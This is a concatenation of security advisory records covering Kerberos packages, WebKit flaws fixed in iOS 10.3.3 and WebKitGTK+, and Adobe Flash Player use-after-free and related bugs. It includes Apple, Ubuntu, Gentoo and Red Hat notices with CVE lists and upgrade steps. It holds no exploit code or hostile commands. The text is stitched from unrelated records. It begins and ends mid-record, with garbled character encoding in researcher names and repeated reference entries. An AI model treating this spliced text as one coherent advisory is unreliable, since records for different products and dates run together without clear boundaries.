d6470636e983d8559d4378f819fba80b467af0a5 i386/krb5-libs-1.5-13.i386.rpm 278c19ec68ed47d35c5c2370df5c48807dba1224 i386/krb5-workstation-1.5-13.i386.rpm aa72a083b60ddfb3dbc0761f13ea7147e09995f1 i386/krb5-server-1.5-13.i386.rpm 9cfd3d1d48deb0e7f83a0a13a5ddf2383386b400 i386/krb5-devel-1.5-13.i386.rpm ORIGINAL ADVISORY: http://fedoranews.org/cms/node/2375 OTHER REFERENCES: SA23690: http://secunia.com/advisories/23690/ SA23696: http://secunia.com/advisories/23696/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------
var-201707-1192 An issue was discovered in certain Apple products. iOS before 10.3.3 is affected. Safari before 10.1.2 is affected. iCloud before 6.2.2 on Windows is affected. iTunes before 12.6.2 on Windows is affected. tvOS before 10.2.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site. WebKit is prone to multiple memory-corruption vulnerabilities. Apple iOS, iCloud for Windows, iTunes for Windows, Safari, and tvOS are all products of the American company Apple (Apple). Apple iOS is an operating system developed for mobile devices; Safari is a web browser that comes with the Mac OS X and iOS operating systems by default. WebKit is an open source web browser engine developed by the KDE community and is currently used by browsers such as Apple Safari and Google Chrome. A memory corruption vulnerability exists in the WebKit component of several Apple products. The following products and versions are affected: Apple Safari prior to 10.1.2; tvOS prior to 10.2.2; iOS prior to 10.3.3; Windows-based iCloud prior to 6.2.2; Windows-based iTunes 12.6 Versions prior to .2. =========================================================================== Ubuntu Security Notice USN-3376-1 August 02, 2017 webkit2gtk vulnerabilities =========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 17.04 - Ubuntu 16.04 LTS Summary: Several security issues were fixed in WebKitGTK+. Software Description: - webkit2gtk: Web content engine library for GTK+ Details: A large number of security issues were discovered in the WebKitGTK+ Web and JavaScript engines. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 17.04: libjavascriptcoregtk-4.0-18 2.16.6-0ubuntu0.17.04.1 libwebkit2gtk-4.0-37 2.16.6-0ubuntu0.17.04.1 Ubuntu 16.04 LTS: libjavascriptcoregtk-4.0-18 2.16.6-0ubuntu0.16.04.1 libwebkit2gtk-4.0-37 2.16.6-0ubuntu0.16.04.1 This update uses a new upstream release, which includes additional bug fixes. After a standard system update you need to restart any applications that use WebKitGTK+, such as Epiphany, to make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2017-07-19-1 iOS 10.3.3 iOS 10.3.3 is now available and addresses the following: Contacts Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: A remote attacker may be able to cause unexpected application termination or arbitrary code execution Description: A buffer overflow issue was addressed through improved memory handling. CVE-2017-7062: Shashank (@cyberboyIndia) CoreAudio Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing a maliciously crafted movie file may lead to arbitrary code execution Description: A memory corruption issue was addressed with improved bounds checking. CVE-2017-7008: Yangkang (@dnpushme) of Qihoo 360 Qex Team EventKitUI Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: A remote attacker may cause an unexpected application termination Description: A resource exhaustion issue was addressed through improved input validation. CVE-2017-7007: JosA(c) Antonio Esteban (@Erratum_) of Sapsi Consultores IOUSBFamily Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7009: shrek_wzw of Qihoo 360 Nirvan Team Kernel Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7022: an anonymous researcher CVE-2017-7024: an anonymous researcher CVE-2017-7026: an anonymous researcher Kernel Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7023: an anonymous researcher CVE-2017-7025: an anonymous researcher CVE-2017-7027: an anonymous researcher CVE-2017-7069: Proteas of Qihoo 360 Nirvan Team Kernel Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A validation issue was addressed with improved input sanitization. CVE-2017-7028: an anonymous researcher CVE-2017-7029: an anonymous researcher libarchive Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Unpacking a maliciously crafted archive may lead to arbitrary code execution Description: A buffer overflow was addressed through improved bounds checking. CVE-2017-7068: found by OSS-Fuzz libxml2 Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Parsing a maliciously crafted XML document may lead to disclosure of user information Description: An out-of-bounds read was addressed through improved bounds checking. CVE-2017-7010: Apple CVE-2017-7013: found by OSS-Fuzz libxpc Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to execute arbitrary code with system privileges Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-7047: Ian Beer of Google Project Zero Messages Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: A remote attacker may cause an unexpected application termination Description: A memory consumption issue was addressed through improved memory handling. CVE-2017-7063: Shashank (@cyberboyIndia) Notifications Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Notifications may appear on the lock screen when disabled Description: A lock screen issue was addressed with improved state management. CVE-2017-7058: Beyza SevinASS of SA1/4leyman Demirel Aniversitesi Safari Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: An inconsistent user interface issue was addressed with improved state management. CVE-2017-2517: xisigr of Tencent's Xuanwu Lab (tencent.com) Safari Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to an infinite number of print dialogs Description: An issue existed where a malicious or compromised website could show infinite print dialogs and make users believe their browser was locked. The issue was addressed through throttling of print dialogs. CVE-2017-7060: Travis Kelley of City of Mishawaka, Indiana Telephony Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An attacker in a privileged network position may be able to execute arbitrary code Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-8248 WebKit Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: A malicious website may exfiltrate data cross-origin Description: Processing maliciously crafted web content may allow cross-origin data to be exfiltrated by using SVG filters to conduct a timing side-channel attack. This issue was addressed by not painting the cross-origin buffer into the frame that gets filtered. CVE-2017-7006: David Kohlbrenner of UC San Diego, an anonymous researcher WebKit Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Visiting a malicious website may lead to address bar spoofing Description: A state management issue was addressed with improved frame handling. CVE-2017-7011: xisigr of Tencent's Xuanwu Lab (tencent.com) WebKit Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7018: lokihardt of Google Project Zero CVE-2017-7020: likemeng of Baidu Security Lab CVE-2017-7030: chenqin of Ant-financial Light-Year Security Lab (eeeaea*'ae-aa1'a(r)a"a(r)eaa(r)$?) CVE-2017-7034: chenqin of Ant-financial Light-Year Security Lab (eeeaea*'ae-aa1'a(r)a"a(r)eaa(r)$?) CVE-2017-7037: lokihardt of Google Project Zero CVE-2017-7039: Ivan Fratric of Google Project Zero CVE-2017-7040: Ivan Fratric of Google Project Zero CVE-2017-7041: Ivan Fratric of Google Project Zero CVE-2017-7042: Ivan Fratric of Google Project Zero CVE-2017-7043: Ivan Fratric of Google Project Zero CVE-2017-7046: Ivan Fratric of Google Project Zero CVE-2017-7048: Ivan Fratric of Google Project Zero CVE-2017-7052: cc working with Trend Micro's Zero Day Initiative CVE-2017-7055: The UK's National Cyber Security Centre (NCSC) CVE-2017-7056: lokihardt of Google Project Zero CVE-2017-7061: lokihardt of Google Project Zero WebKit Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An application may be able to read restricted memory Description: A memory initialization issue was addressed through improved memory handling. CVE-2017-7064: lokihardt of Google Project Zero WebKit Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content with DOMParser may lead to cross site scripting Description: A logic issue existed in the handling of DOMParser. This issue was addressed with improved state management. CVE-2017-7038: Egor Karbutov (@ShikariSenpai) of Digital Security and Egor Saltykov (@ansjdnakjdnajkd) of Digital Security, Neil Jenkins of FastMail Pty Ltd CVE-2017-7059: an anonymous researcher WebKit Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed through improved memory handling. CVE-2017-7049: Ivan Fratric of Google Project Zero WebKit Page Loading Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7019: Zhiyang Zeng of Tencent Security Platform Department WebKit Web Inspector Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: Processing maliciously crafted web content may lead to arbitrary code execution Description: Multiple memory corruption issues were addressed with improved memory handling. CVE-2017-7012: Apple Wi-Fi Available for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation Impact: An attacker within range may be able to execute arbitrary code on the Wi-Fi chip Description: A memory corruption issue was addressed with improved memory handling. CVE-2017-9417: Nitay Artenstein of Exodus Intelligence Installation note: This update is available through iTunes and Software Update on your iOS device, and will not appear in your computer's Software Update application, or in the Apple Downloads site. Make sure you have an Internet connection and have installed the latest version of iTunes from https://www.apple.com/itunes/ iTunes and Software Update on the device will automatically check Apple's update server on its weekly schedule. When an update is detected, it is downloaded and the option to be installed is presented to the user when the iOS device is docked. We recommend applying the update immediately if possible. Selecting Don't Install will present the option the next time you connect your iOS device. The automatic update process may take up to a week depending on the day that iTunes or the device checks for updates. You may manually obtain the update via the Check for Updates button within iTunes, or the Software Update on your device. To check that the iPhone, iPod touch, or iPad has been updated: * Navigate to Settings * Select General * Select About. The version after applying this update will be "10.3.3". Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222 This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/ -----BEGIN PGP SIGNATURE----- Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJZb5VSAAoJEIOj74w0bLRGpo4QAJ2hfs2yF+Iia3g7giHDBfd2 j8FJ8HvENOOaKGn1RkF6AR7l5QJI25LvnO0pjQh7pzUUCDLXg3e/eb0DNiVtVg5J shJOVSRGR7tq3V+OUZ1QNwsG6YRjxE+vseThHalVy1loox072N6qilEHvGY4RWIr yFPLCvSDKERldls2cVsaOiNo9VTPCj1tJyLHbqShFDzuR4jYgIgnS6kb8nvgbjIo Cnl+VwDClj7aMBG2Hq4QkEq6zUW261fU8DN4VM/qtISV2H4VkrOxrTwDQCKihQ+l qa+ylvg+PTQ2dvjgBxxm+znmiB6gpa2kPJcU9VgujjEUAoaZgE2Hopay65JPw9G0 nrtBvyMPtv+StxgD/UCm2J5PiIZfMrzHxt+GlauUwrGXdRJYJ6FsJla55wVygxd4 WsrUj03qS/jc6B2wkF1smOsHPgUUVlK05PvuK6bTmDwRPH9/ybIIIlUFx5mXj4jS wSiVHe0DRaJkWxcLx6p2HJaY2OnUJAFGfOfLBcTkxCoPkt/Wdain8k2eAtrIGCs1 AFCOqXxOo30aaUD9qUkX42fr6bE1N8gfMN36f8VGyv5e4gz5snljQ8arAD1+eFyh vE+N3JdR/rfM4KnCTAmOQcyEIZXB48rEwWOVnHVqYf6qyyw2W5+pseKEkU5+4R/a GcaYRxNitIzBC6tAXWPF =LiU+ -----END PGP SIGNATURE----- . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201710-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - https://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WebKitGTK+: Multiple Vulnerabilities Date: October 13, 2017 Bugs: #626142 ID: 201710-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in WebkitGTK+, the worst of which may allow remote attackers to execute arbitrary code. Background ========== WebKitGTK+ is a full-featured port of the WebKit rendering engine, suitable for projects requiring any kind of web integration, offers Webkitas full functionality and is used on a wide range of systems. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-libs/webkit-gtk < 2.16.6:4 >= 2.16.6:4 Description =========== Multiple vulnerabilities have been discovered in WebkitGTK+. Please review the references below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All WebKitGTK+ users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/webkit-gtk-2.16.6" Packages which depend on this library may need to be recompiled. Tools such as revdep-rebuild may assist in identifying some of these packages. References ========== [ 1 ] CVE-2017-7006 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7006 [ 2 ] CVE-2017-7011 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7011 [ 3 ] CVE-2017-7012 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7012 [ 4 ] CVE-2017-7018 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7018 [ 5 ] CVE-2017-7019 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7019 [ 6 ] CVE-2017-7020 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7020 [ 7 ] CVE-2017-7030 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7030 [ 8 ] CVE-2017-7034 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7034 [ 9 ] CVE-2017-7037 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7037 [ 10 ] CVE-2017-7038 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7038 [ 11 ] CVE-2017-7039 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7039 [ 12 ] CVE-2017-7040 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7040 [ 13 ] CVE-2017-7041 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7041 [ 14 ] CVE-2017-7042 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7042 [ 15 ] CVE-2017-7043 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2017-7043 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: https://security.gentoo.org/glsa/201710-14 Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2017 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . CVE-2017-7012: Apple Installation note: Safari 10.1.2 may be obtained from the Mac App Store
var-201302-0149 Use-after-free vulnerability in Adobe Flash Player before 10.3.183.63 and 11.x before 11.6.602.168 on Windows, before 10.3.183.61 and 11.x before 11.6.602.167 on Mac OS X, before 10.3.183.61 and 11.x before 11.2.202.270 on Linux, before 11.1.111.43 on Android 2.x and 3.x, and before 11.1.115.47 on Android 4.x; Adobe AIR before 3.6.0.597; and Adobe AIR SDK before 3.6.0.599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0649 and CVE-2013-1374. Adobe Flash Player Use freed memory (Use-after-free) May allow arbitrary code execution vulnerabilities. This vulnerability CVE-2013-0649 and CVE-2013-1374 Is a different vulnerability.An attacker could execute arbitrary code. Adobe Flash Player and AIR are prone to a remote code-execution vulnerability. Failed exploit attempts will likely cause denial-of-service conditions. Note: This issue was previously covered in BID 57907 (Adobe Flash Player and AIR APSB13-05 Multiple Security Vulnerabilities), but has been given its own record to better document it. The product enables viewing of applications, content and video across screens and browsers. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Critical: flash-plugin security update Advisory ID: RHSA-2013:0254-01 Product: Red Hat Enterprise Linux Extras Advisory URL: https://rhn.redhat.com/errata/RHSA-2013-0254.html Issue date: 2013-02-13 CVE Names: CVE-2013-0637 CVE-2013-0638 CVE-2013-0639 CVE-2013-0642 CVE-2013-0644 CVE-2013-0645 CVE-2013-0647 CVE-2013-0649 CVE-2013-1365 CVE-2013-1366 CVE-2013-1367 CVE-2013-1368 CVE-2013-1369 CVE-2013-1370 CVE-2013-1372 CVE-2013-1373 CVE-2013-1374 ===================================================================== 1. Summary: An updated Adobe Flash Player package that fixes several security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary. The Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux Desktop Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Desktop Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 5) - i386, x86_64 Red Hat Enterprise Linux Server Supplementary (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation Supplementary (v. 6) - i386, x86_64 3. Description: The flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in. These vulnerabilities are detailed in the Adobe Security bulletin APSB13-05, listed in the References section. Specially-crafted SWF content could cause flash-plugin to crash or, potentially, execute arbitrary code when a victim loads a page containing the malicious SWF content. (CVE-2013-0638, CVE-2013-0639, CVE-2013-0642, CVE-2013-0644, CVE-2013-0645, CVE-2013-0647, CVE-2013-0649, CVE-2013-1365, CVE-2013-1366, CVE-2013-1367, CVE-2013-1368, CVE-2013-1369, CVE-2013-1370, CVE-2013-1372, CVE-2013-1373, CVE-2013-1374) A flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially-crafted web page. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/knowledge/articles/11258 5. Bugs fixed (http://bugzilla.redhat.com/): 910570 - flash-plugin: multiple code execution flaws (APSB13-05) 910571 - CVE-2013-0637 flash-plugin: information disclosure flaw (APSB13-05) 6. Package List: Red Hat Enterprise Linux Desktop Supplementary (v. 5): i386: flash-plugin-11.2.202.270-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.270-1.el5.i386.rpm Red Hat Enterprise Linux Server Supplementary (v. 5): i386: flash-plugin-11.2.202.270-1.el5.i386.rpm x86_64: flash-plugin-11.2.202.270-1.el5.i386.rpm Red Hat Enterprise Linux Desktop Supplementary (v. 6): i386: flash-plugin-11.2.202.270-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.270-1.el6.i686.rpm Red Hat Enterprise Linux Server Supplementary (v. 6): i386: flash-plugin-11.2.202.270-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.270-1.el6.i686.rpm Red Hat Enterprise Linux Workstation Supplementary (v. 6): i386: flash-plugin-11.2.202.270-1.el6.i686.rpm x86_64: flash-plugin-11.2.202.270-1.el6.i686.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2013-0637.html https://www.redhat.com/security/data/cve/CVE-2013-0638.html https://www.redhat.com/security/data/cve/CVE-2013-0639.html https://www.redhat.com/security/data/cve/CVE-2013-0642.html https://www.redhat.com/security/data/cve/CVE-2013-0644.html https://www.redhat.com/security/data/cve/CVE-2013-0645.html https://www.redhat.com/security/data/cve/CVE-2013-0647.html https://www.redhat.com/security/data/cve/CVE-2013-0649.html https://www.redhat.com/security/data/cve/CVE-2013-1365.html https://www.redhat.com/security/data/cve/CVE-2013-1366.html https://www.redhat.com/security/data/cve/CVE-2013-1367.html https://www.redhat.com/security/data/cve/CVE-2013-1368.html https://www.redhat.com/security/data/cve/CVE-2013-1369.html https://www.redhat.com/security/data/cve/CVE-2013-1370.html https://www.redhat.com/security/data/cve/CVE-2013-1372.html https://www.redhat.com/security/data/cve/CVE-2013-1373.html https://www.redhat.com/security/data/cve/CVE-2013-1374.html https://access.redhat.com/security/updates/classification/#critical http://www.adobe.com/support/security/bulletins/apsb13-05.html 8. Contact: The Red Hat security contact is <secalert@redhat.com>. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2013 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFRG2NzXlSAg2UNWIIRAjGKAJ4lnleOpb7dBn8s/DCk7wAK9qbQJACgm3Vs pnyD10c/hdKGIm0b1Kjv3eY= =+cgh -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . SOLUTION: Update to version 24.0.1312.70. Background ========== The Adobe Flash Player is a renderer for the SWF file format, which is commonly used to provide interactive websites. Please review the CVE identifiers referenced below for details. Impact ====== A remote attacker could entice a user to open specially crafted SWF content, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. Furthermore, a remote attacker may be able to bypass access restrictions. Workaround ========== There is no known workaround at this time. Resolution ========== All Adobe Flash Player users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-plugins/adobe-flash-11.2.202.310" References ========== [ 1 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 2 ] CVE-2012-5248 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5248 [ 3 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 4 ] CVE-2012-5249 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5249 [ 5 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 6 ] CVE-2012-5250 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5250 [ 7 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 8 ] CVE-2012-5251 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5251 [ 9 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 10 ] CVE-2012-5252 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5252 [ 11 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 12 ] CVE-2012-5253 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5253 [ 13 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 14 ] CVE-2012-5254 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5254 [ 15 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 16 ] CVE-2012-5255 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5255 [ 17 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 18 ] CVE-2012-5256 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5256 [ 19 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 20 ] CVE-2012-5257 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5257 [ 21 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 22 ] CVE-2012-5258 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5258 [ 23 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 24 ] CVE-2012-5259 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5259 [ 25 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 26 ] CVE-2012-5260 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5260 [ 27 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 28 ] CVE-2012-5261 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5261 [ 29 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 30 ] CVE-2012-5262 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5262 [ 31 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 32 ] CVE-2012-5263 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5263 [ 33 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 34 ] CVE-2012-5264 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5264 [ 35 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 36 ] CVE-2012-5265 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5265 [ 37 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 38 ] CVE-2012-5266 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5266 [ 39 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 40 ] CVE-2012-5267 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5267 [ 41 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 42 ] CVE-2012-5268 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5268 [ 43 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 44 ] CVE-2012-5269 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5269 [ 45 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 46 ] CVE-2012-5270 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5270 [ 47 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 48 ] CVE-2012-5271 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5271 [ 49 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 50 ] CVE-2012-5272 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5272 [ 51 ] CVE-2012-5274 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5274 [ 52 ] CVE-2012-5275 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5275 [ 53 ] CVE-2012-5276 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5276 [ 54 ] CVE-2012-5277 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5277 [ 55 ] CVE-2012-5278 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5278 [ 56 ] CVE-2012-5279 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5279 [ 57 ] CVE-2012-5280 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5280 [ 58 ] CVE-2012-5676 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5676 [ 59 ] CVE-2012-5677 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5677 [ 60 ] CVE-2012-5678 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5678 [ 61 ] CVE-2013-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0504 [ 62 ] CVE-2013-0630 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0630 [ 63 ] CVE-2013-0633 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0633 [ 64 ] CVE-2013-0634 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0634 [ 65 ] CVE-2013-0637 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0637 [ 66 ] CVE-2013-0638 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0638 [ 67 ] CVE-2013-0639 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0639 [ 68 ] CVE-2013-0642 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0642 [ 69 ] CVE-2013-0643 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0643 [ 70 ] CVE-2013-0644 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0644 [ 71 ] CVE-2013-0645 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0645 [ 72 ] CVE-2013-0646 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0646 [ 73 ] CVE-2013-0647 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0647 [ 74 ] CVE-2013-0648 